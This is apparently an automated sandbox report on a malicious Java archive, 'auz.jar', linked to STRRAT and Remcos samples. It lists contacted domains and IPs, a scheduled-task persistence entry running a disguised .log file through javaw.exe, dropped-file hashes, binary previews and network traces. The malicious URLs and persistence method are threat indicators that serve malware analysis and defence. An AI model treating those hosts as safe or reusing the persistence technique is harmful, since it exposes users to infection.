                    https://www.paradisodomenico.it/wp-content//api.php?java.exe, 00000002.00000002.565299658.00000000052A7000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054CF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crlsjava.exe, 00000002.00000002.565299658.0000000005483000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.quovadisglobal.com/cpsjavaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://cps.chambersign.org/cps/chambersroot.htmljavaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.certplus.com/CRL/class3P.crljavaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.paradisodomenico.it/wp-content/java.exe, 00000002.00000002.568546871.000000000A928000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.565299658.00000000052A7000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054CF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.geoplugin.net/json.gp?ip=)javaw.exe, 0000000A.00000002.565143131.000000000549D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.securetrust.com/STCA.crljava.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.geoplugin.net/json.gp?javaw.exe, 0000000A.00000002.565143131.000000000548B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.000000000549D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.xrampsecurity.com/XGCA.crl0java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.quovadis.bmjava.exe, 00000002.00000002.568546871.000000000A8DB000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.quovadis.bm0java.exe, 00000002.00000002.568546871.000000000A8DB000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://adrenalinecyber.com/login/java.exe, 00000002.00000002.565299658.0000000005218000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.568546871.000000000A928000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054B3000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.paradisodomenico.itjava.exe, 00000002.00000002.565299658.00000000052A7000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054CF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.ujava.exe, 00000002.00000002.573889478.0000000015D0D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.317230891.0000000015D0E000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.316669999.0000000015CEA000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.315966186.0000000015CCD000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.395155985.0000000015D06000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.chambersign.org/chambersroot.crljavaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      46.16.95.61
                      paradisodomenico.itItaly
                      52030SERVERPLAN-ASITfalse
                      178.237.33.50
                      geoplugin.netNetherlands
                      8455ATOM86-ASATOM86NLfalse
                      Joe Sandbox Version:37.0.0 Beryl
                      Analysis ID:841597
                      Start date and time:2023-04-05 11:37:46 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 9m 35s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsfilecookbook.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:25
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • GSI enabled (Java)
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample file name:auz.jar
                      Detection:MAL
                      Classification:mal60.expl.winJAR@30/3@10/2
                      EGA Information:Failed
                      HDC Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .jar
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                      • Execution Graph export aborted for target java.exe, PID 6732 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.
                      TimeTypeDescription
                      11:38:44Task SchedulerRun new task: JavaConnect path: "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" s>-jar "C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log"
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      46.16.95.61tar.oneGet hashmaliciousUnknownBrowse
                        178.237.33.50b49GWr99um.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        pE1IE5u0hc.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        Arrival_notice.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        1OSgM48KMg.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        tar.oneGet hashmaliciousUnknownBrowse
                        • www.geoplugin.net/json.gp?ip=
                        nwE3gOeoSU.exeGet hashmaliciousGuLoader, RemcosBrowse
                        • geoplugin.net/json.gp
                        casino.comGet hashmaliciousRemcos, Parallax RAT, TinyNukeBrowse
                        • geoplugin.net/json.gp
                        PO_21571345240826.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • geoplugin.net/json.gp
                        DHL.AWB-66546754.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • geoplugin.net/json.gp
                        Cerere_de_ofert#U0103_(Universitatea_din_Oradea)_Eui894_-_CRO633.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        DHL_EXPRESS_Pdf.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        Shipping_Documents_PDF.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        Guisarme1.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • geoplugin.net/json.gp
                        0987654457008.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • geoplugin.net/json.gp
                        RDG9090009980.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        INVOICE9765456789.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • geoplugin.net/json.gp
                        FACTURA09000000000000000000098.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • geoplugin.net/json.gp
                        Solicitud_de_oferta_(Universidad_hispanoamericana)_EUI894_-_CRR633.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        DHL_EXPRESS_Doc.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        geoplugin.netDI_PIPE_AND_FITTINGS_RFQ_79988700.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        b49GWr99um.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        pE1IE5u0hc.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Arrival_notice.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        1OSgM48KMg.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        nwE3gOeoSU.exeGet hashmaliciousGuLoader, RemcosBrowse
                        • 178.237.33.50
                        casino.comGet hashmaliciousRemcos, Parallax RAT, TinyNukeBrowse
                        • 178.237.33.50
                        PO_21571345240826.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        DHL.AWB-66546754.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        Cerere_de_ofert#U0103_(Universitatea_din_Oradea)_Eui894_-_CRO633.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        [DHL]_#Uc218#Uc785#Uc2e0#Uace0#Uc218#Ub9ac#Ub0b4#Uc5ed#Uc11c(#Uc218#Ub9ac#Uc804#Ub0a9#Ubd80).exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        DHL_EXPRESS_Pdf.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Shipping_Documents_PDF.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Guisarme1.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        0987654457008.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        RDG9090009980.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Spaebook.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        INVOICE9765456789.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        ATOM86-ASATOM86NLDI_PIPE_AND_FITTINGS_RFQ_79988700.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        b49GWr99um.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        pE1IE5u0hc.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Arrival_notice.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        1OSgM48KMg.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        tar.oneGet hashmaliciousUnknownBrowse
                        • 178.237.33.50
                        nwE3gOeoSU.exeGet hashmaliciousGuLoader, RemcosBrowse
                        • 178.237.33.50
                        casino.comGet hashmaliciousRemcos, Parallax RAT, TinyNukeBrowse
                        • 178.237.33.50
                        PO_21571345240826.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        DHL.AWB-66546754.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        Cerere_de_ofert#U0103_(Universitatea_din_Oradea)_Eui894_-_CRO633.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        [DHL]_#Uc218#Uc785#Uc2e0#Uace0#Uc218#Ub9ac#Ub0b4#Uc5ed#Uc11c(#Uc218#Ub9ac#Uc804#Ub0a9#Ubd80).exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        DHL_EXPRESS_Pdf.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Shipping_Documents_PDF.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Guisarme1.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        0987654457008.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        RDG9090009980.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Spaebook.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        INVOICE9765456789.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        SERVERPLAN-ASITtar.oneGet hashmaliciousUnknownBrowse
                        • 46.16.95.61
                        https://gg.gg/13jum5Get hashmaliciousHTMLPhisherBrowse
                        • 185.81.4.195
                        DeGHXF1WPn.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 46.16.93.187
                        Redeem Your R100,000.00 - FNB eBucks Rewards Today.pdf.htmlGet hashmaliciousUnknownBrowse
                        • 185.81.4.68
                        https://tizianapepe.it/pa/loroeummdrhaGet hashmaliciousUnknownBrowse
                        • 185.81.4.134
                        RFQ - 10000796_pdf .exeGet hashmaliciousAgentTeslaBrowse
                        • 46.254.34.12
                        zWcjQM5eDT.exeGet hashmaliciousFormBookBrowse
                        • 46.254.38.227
                        https://amluxury.it/mde/c76f46423c8f10b270285ae48b1b7468.htmlGet hashmaliciousHTMLPhisherBrowse
                        • 185.81.2.105
                        http://www.acala.it/templates/wunderkind/js/jquery.sticky.jsGet hashmaliciousUnknownBrowse
                        • 185.81.2.117
                        jKira.armGet hashmaliciousMiraiBrowse
                        • 46.30.243.179
                        phantom.mipsGet hashmaliciousMiraiBrowse
                        • 46.30.243.108
                        Linux_amd64Get hashmaliciousUnknownBrowse
                        • 46.254.36.95
                        New Order Specifications Pdf.exeGet hashmaliciousFormBookBrowse
                        • 93.95.216.71
                        Swift $21,500.exeGet hashmaliciousFormBookBrowse
                        • 93.95.216.71
                        TwlnaihoCKGet hashmaliciousMiraiBrowse
                        • 46.254.38.70
                        Order#45J_11-06-21 pdf.exeGet hashmaliciousFormBookBrowse
                        • 93.95.216.71
                        dqVPlpmWYt.exeGet hashmaliciousUnknownBrowse
                        • 185.81.4.32
                        cp.msi.exeGet hashmaliciousUnknownBrowse
                        • 185.81.0.109
                        ot.msiGet hashmaliciousAgentTesla GuLoaderBrowse
                        • 185.81.0.109
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        d2935c58fe676744fecc8614ee5356c7Open_Invoice.PDF.jarGet hashmaliciousSTRRATBrowse
                        • 46.16.95.61
                        clientjar.jarGet hashmaliciousUnknownBrowse
                        • 46.16.95.61
                        clientjar.jarGet hashmaliciousUnknownBrowse
                        • 46.16.95.61
                        #Uacc4#Uc88c_#Uba85#Uc138#Uc11c_#Uc5f4#Uae30.PDF.jarGet hashmaliciousSTRRATBrowse
                        • 46.16.95.61
                        Proof_of_payment.jsGet hashmaliciousSTRRATBrowse
                        • 46.16.95.61
                        Proof_of_payment.jsGet hashmaliciousSTRRATBrowse
                        • 46.16.95.61
                        Payment_proof.jsGet hashmaliciousSTRRATBrowse
                        • 46.16.95.61
                        Payment_proof.jsGet hashmaliciousSTRRATBrowse
                        • 46.16.95.61
                        PO_5116877_88639064_GMD_PDF.jarGet hashmaliciousSTRRATBrowse
                        • 46.16.95.61
                        PROOF_OF_PAYMENT.jarGet hashmaliciousSTRRATBrowse
                        • 46.16.95.61
                        PROOF_OF_PAYMENT.jarGet hashmaliciousSTRRATBrowse
                        • 46.16.95.61
                        P2300103.PDF.jarGet hashmaliciousSTRRATBrowse
                        • 46.16.95.61
                        Music91.jarGet hashmaliciousSTRRATBrowse
                        • 46.16.95.61
                        1991KLI.jarGet hashmaliciousSTRRATBrowse
                        • 46.16.95.61
                        UNILEVER_PURCHASE_ORDER_#076863_for_acknowledgement.pdf.jarGet hashmaliciousSTRRATBrowse
                        • 46.16.95.61
                        HAWB0007564359.pdf.jarGet hashmaliciousSTRRATBrowse
                        • 46.16.95.61
                        AWB#00756543.pdf.jarGet hashmaliciousSTRRATBrowse
                        • 46.16.95.61
                        Payment_breakdown.pdf.jarGet hashmaliciousSTRRATBrowse
                        • 46.16.95.61
                        Payment_breakdown.pdf.jarGet hashmaliciousSTRRATBrowse
                        • 46.16.95.61
                        No context
                        Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):57
                        Entropy (8bit):4.817551365376543
                        Encrypted:false
                        SSDEEP:3:oFj4I5vpN6yUROadm:oJ5X6yGOaA
                        MD5:90BF563F80E4D1569BFDC20814CCAC64
                        SHA1:9A5FFDB06C9744B9AA67156DE1CEB40148441601
                        SHA-256:52B750854D295B393ADE2EF54406BA6E7AB29E53B52E6743F0B2708E239BEDC6
                        SHA-512:72A5725206E90D7EBC78BE783E2E29F7AF5247A914213EA5B433EDEBE1AEC6D64828EBE2234069FDF4D089AD9B3E1080CA099A2D6F743859074EDFFBA2A7FA2C
                        Malicious:false
                        Preview:C:\Program Files (x86)\Java\jre1.8.0_211..1680687525386..
                        Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):45
                        Entropy (8bit):0.9111711733157262
                        Encrypted:false
                        SSDEEP:3:/lwlt7n:WNn
                        MD5:C8366AE350E7019AEFC9D1E6E6A498C6
                        SHA1:5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
                        SHA-256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
                        SHA-512:33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
                        Malicious:false
                        Preview:........................................J2SE.
                        Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                        Category:dropped
                        Size (bytes):189466
                        Entropy (8bit):7.968224085935667
                        Encrypted:false
                        SSDEEP:3072:/aZCV6DcW4xLOMB6DrxnuahzqBc7EPTe+1sVCwWL3OGE1ZynOtQwSelrRVZBAMrQ:Wc6yxLzQ/xuCzeLeAwWL3WJpRV3AME
                        MD5:2792F3AA4B0F15C488C32BCD1E03AFD8
                        SHA1:B49223709C7A83125912A2474E79B446C622B232
                        SHA-256:5487A1B50399574FF09D2F8BB6FA87D0B194C840E8AEDA26196B612A6A3FCB3A
                        SHA-512:FB6B5E982D85BFBEFD45FEED848873D79214859D34651FA209476C65A70A09E898061E95CF23D4C8984BDC910E0F945CA2DCE21DF2BC8714FBCE1F39EE184BCE
                        Malicious:true
                        Preview:PK........W..V............B...objecttification/postschool/overfancifulness/paralinguistics.class.T[w.D....Q..v.BCSZ.....$.C/......$N.)..V.H>........x.C....px..?.....CS..;.;..7.......0.]..g{..B.u.........h:..w.q...Yo[6..|Kwu..m....)`.......t.._.}).2\...7"o.....m.....-.....<.Y......W.0$,.*.c1D....43..d+.....}~....n..W....o...i...".a.$....&\JL...S.......d..FpN.Y..0L.Bd.G..<C...*.k\:X0m.1.v.T2.k$.........qNY..'|f....I....E.r.E..B.....nIr..H.8..-.....3\8..+.C..s..c.c...ix..*.....nn.5.....c.a....l4..\.}..z.G.y.~27\S.VZ.=.].+.r....C...L...i.2.c.....w.0[..k~3.;..}y.....6.M..c....%q..{[.V~A.....].p......]'W.u.>-I..:48{...e?.r?.u..<G..%p.a...u.v.*1.^.]|6..K-n..#.O..q...C..O...D.d....%.*.Or.Zb.|J5..2.5.N.V..n$.........u?.C}wkw..KN.A.*6%...=.`.!F.6}6K.>..*...@]..u..W.....V.d.RI.o.&......[.,].S.B.H.F......z.l.y..Y.k...]&.c........4....@.....";.E.M.#.$......!..d~H.S`s..,Zk.5...%IC..Bg.IJ[.<....bh. .Q...gx.G$..!.x..j.G..^...=|..1#....`....)4...f.....\..+.
                        File type:Zip archive data, at least v2.0 to extract, compression method=deflate
                        Entropy (8bit):7.968224085935667
                        TrID:
                        • Java Archive (13504/1) 62.80%
                        • ZIP compressed archive (8000/1) 37.20%
                        File name:auz.jar
                        File size:189466
                        MD5:2792f3aa4b0f15c488c32bcd1e03afd8
                        SHA1:b49223709c7a83125912a2474e79b446c622b232
                        SHA256:5487a1b50399574ff09d2f8bb6fa87d0b194c840e8aeda26196b612a6a3fcb3a
                        SHA512:fb6b5e982d85bfbefd45feed848873d79214859d34651fa209476c65a70a09e898061e95cf23d4c8984bdc910e0f945ca2dce21df2bc8714fbce1f39ee184bce
                        SSDEEP:3072:/aZCV6DcW4xLOMB6DrxnuahzqBc7EPTe+1sVCwWL3OGE1ZynOtQwSelrRVZBAMrQ:Wc6yxLzQ/xuCzeLeAwWL3WJpRV3AME
                        TLSH:0B040204FE90C69CEA43C0BEE15E859DEF2C4A8E450DC76F36F095A05A95CD2CB039DA
                        File Content Preview:PK........W..V............B...objecttification/postschool/overfancifulness/paralinguistics.class.T[w.D.....Q..v.BCSZ.....$..C/.......$N.)..V.H>..........x.C....px...?......CS...;.;..7.......0.]..g{..B.u..........h:..w.q....Yo[6..|Kwu...m....)`.......t.._.
                        Icon Hash:d28c8e8ea2868ad6
                        TimestampSource PortDest PortSource IPDest IP
                        Apr 5, 2023 11:38:48.411292076 CEST4969680192.168.2.4178.237.33.50
                        Apr 5, 2023 11:38:48.437109947 CEST8049696178.237.33.50192.168.2.4
                        Apr 5, 2023 11:38:48.437208891 CEST4969680192.168.2.4178.237.33.50
                        Apr 5, 2023 11:38:48.449275970 CEST4969680192.168.2.4178.237.33.50
                        Apr 5, 2023 11:38:48.479932070 CEST8049696178.237.33.50192.168.2.4
                        Apr 5, 2023 11:38:48.498128891 CEST4969680192.168.2.4178.237.33.50
                        Apr 5, 2023 11:38:48.529597998 CEST8049696178.237.33.50192.168.2.4
                        Apr 5, 2023 11:38:48.631252050 CEST4969680192.168.2.4178.237.33.50
                        Apr 5, 2023 11:38:49.529994965 CEST8049696178.237.33.50192.168.2.4
                        Apr 5, 2023 11:38:49.530143976 CEST4969680192.168.2.4178.237.33.50
                        Apr 5, 2023 11:38:51.015083075 CEST4969780192.168.2.4178.237.33.50
                        Apr 5, 2023 11:38:51.041652918 CEST8049697178.237.33.50192.168.2.4
                        Apr 5, 2023 11:38:51.042725086 CEST4969780192.168.2.4178.237.33.50
                        Apr 5, 2023 11:38:51.046195030 CEST4969780192.168.2.4178.237.33.50
                        Apr 5, 2023 11:38:51.084790945 CEST8049697178.237.33.50192.168.2.4
                        Apr 5, 2023 11:38:51.098398924 CEST4969780192.168.2.4178.237.33.50
                        Apr 5, 2023 11:38:51.128781080 CEST8049697178.237.33.50192.168.2.4
                        Apr 5, 2023 11:38:51.240856886 CEST4969780192.168.2.4178.237.33.50
                        Apr 5, 2023 11:38:52.128710032 CEST8049697178.237.33.50192.168.2.4
                        Apr 5, 2023 11:38:52.128880978 CEST4969780192.168.2.4178.237.33.50
                        Apr 5, 2023 11:38:58.524214029 CEST4969680192.168.2.4178.237.33.50
                        Apr 5, 2023 11:38:58.550086021 CEST8049696178.237.33.50192.168.2.4
                        Apr 5, 2023 11:39:01.133686066 CEST4969780192.168.2.4178.237.33.50
                        Apr 5, 2023 11:39:01.159468889 CEST8049697178.237.33.50192.168.2.4
                        Apr 5, 2023 11:39:19.002933979 CEST49698443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:19.003022909 CEST4434969846.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:19.003118038 CEST49698443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:19.060039997 CEST49698443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:19.060117006 CEST4434969846.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:19.164464951 CEST4434969846.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:19.164583921 CEST49698443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:19.189460039 CEST49698443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:19.189518929 CEST4434969846.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:19.207153082 CEST49698443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:19.207180023 CEST4434969846.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:19.236090899 CEST49698443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:19.236123085 CEST4434969846.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:19.236562967 CEST4434969846.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:19.248668909 CEST49698443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:19.248722076 CEST4434969846.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:19.443244934 CEST4434969846.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:19.443437099 CEST4434969846.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:19.443530083 CEST49698443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:19.447084904 CEST49698443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:19.447134972 CEST4434969846.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:19.447168112 CEST49698443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:19.447168112 CEST49698443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:19.447187901 CEST4434969846.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:21.618132114 CEST49699443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:21.618206024 CEST4434969946.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:21.618336916 CEST49699443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:21.657855034 CEST49699443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:21.657924891 CEST4434969946.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:21.752778053 CEST4434969946.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:21.752924919 CEST49699443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:21.774317980 CEST49699443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:21.774358988 CEST4434969946.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:21.798698902 CEST49699443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:21.798722982 CEST4434969946.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:21.824012995 CEST49699443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:21.824038029 CEST4434969946.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:21.824354887 CEST4434969946.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:21.828176975 CEST49699443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:21.828201056 CEST4434969946.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:22.028104067 CEST4434969946.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:22.028202057 CEST4434969946.16.95.61192.168.2.4
                        Apr 5, 2023 11:39:22.028276920 CEST49699443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:22.029706001 CEST49699443192.168.2.446.16.95.61
                        Apr 5, 2023 11:39:22.029725075 CEST4434969946.16.95.61192.168.2.4
                        TimestampSource PortDest PortSource IPDest IP
                        Apr 5, 2023 11:38:45.880076885 CEST5091153192.168.2.48.8.8.8
                        Apr 5, 2023 11:38:45.908870935 CEST53509118.8.8.8192.168.2.4
                        Apr 5, 2023 11:38:48.380346060 CEST5968353192.168.2.48.8.8.8
                        Apr 5, 2023 11:38:48.404733896 CEST53596838.8.8.8192.168.2.4
                        Apr 5, 2023 11:38:50.733702898 CEST6416753192.168.2.48.8.8.8
                        Apr 5, 2023 11:38:50.763087988 CEST53641678.8.8.8192.168.2.4
                        Apr 5, 2023 11:38:50.987679958 CEST5856553192.168.2.48.8.8.8
                        Apr 5, 2023 11:38:51.009295940 CEST53585658.8.8.8192.168.2.4
                        Apr 5, 2023 11:38:58.811969042 CEST5223953192.168.2.48.8.8.8
                        Apr 5, 2023 11:38:58.848505974 CEST53522398.8.8.8192.168.2.4
                        Apr 5, 2023 11:39:01.432755947 CEST5680753192.168.2.48.8.8.8
                        Apr 5, 2023 11:39:01.456254005 CEST53568078.8.8.8192.168.2.4
                        Apr 5, 2023 11:39:08.900214911 CEST6100753192.168.2.48.8.8.8
                        Apr 5, 2023 11:39:08.921135902 CEST53610078.8.8.8192.168.2.4
                        Apr 5, 2023 11:39:11.503990889 CEST6068653192.168.2.48.8.8.8
                        Apr 5, 2023 11:39:11.525038004 CEST53606868.8.8.8192.168.2.4
                        Apr 5, 2023 11:39:18.942569017 CEST6112453192.168.2.48.8.8.8
                        Apr 5, 2023 11:39:18.999263048 CEST53611248.8.8.8192.168.2.4
                        Apr 5, 2023 11:39:21.544714928 CEST5944453192.168.2.48.8.8.8
                        Apr 5, 2023 11:39:21.615022898 CEST53594448.8.8.8192.168.2.4
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Apr 5, 2023 11:38:45.880076885 CEST192.168.2.48.8.8.80x4e6bStandard query (0)adrenalinecyber.comA (IP address)IN (0x0001)false
                        Apr 5, 2023 11:38:48.380346060 CEST192.168.2.48.8.8.80x6496Standard query (0)www.geoplugin.netA (IP address)IN (0x0001)false
                        Apr 5, 2023 11:38:50.733702898 CEST192.168.2.48.8.8.80xdffeStandard query (0)adrenalinecyber.comA (IP address)IN (0x0001)false
